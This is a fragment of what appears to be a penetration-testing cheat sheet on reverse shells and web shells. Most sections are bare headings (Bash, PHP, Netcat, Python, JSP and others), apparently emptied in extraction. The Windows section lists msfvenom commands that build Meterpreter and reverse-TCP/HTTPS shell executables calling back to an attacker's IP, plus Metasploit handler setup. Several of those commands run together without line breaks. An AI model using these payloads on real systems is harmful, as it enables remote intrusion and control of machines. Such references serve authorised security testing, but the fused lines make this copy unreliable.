Shells
Reverse-shells
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcpmsfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exemsfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exeuse exploit/multi/handler
set payload windows/shell_reverse_tcpInject payload into binary
Linux
Binary
Bash
Php
Netcat
Reverse shell
With -e flag
Ncat
Telnet
Perl
Ruby
Java
Python
Web-shells
PHP
ASP
WAR
JSP
Last updated
Was this helpful?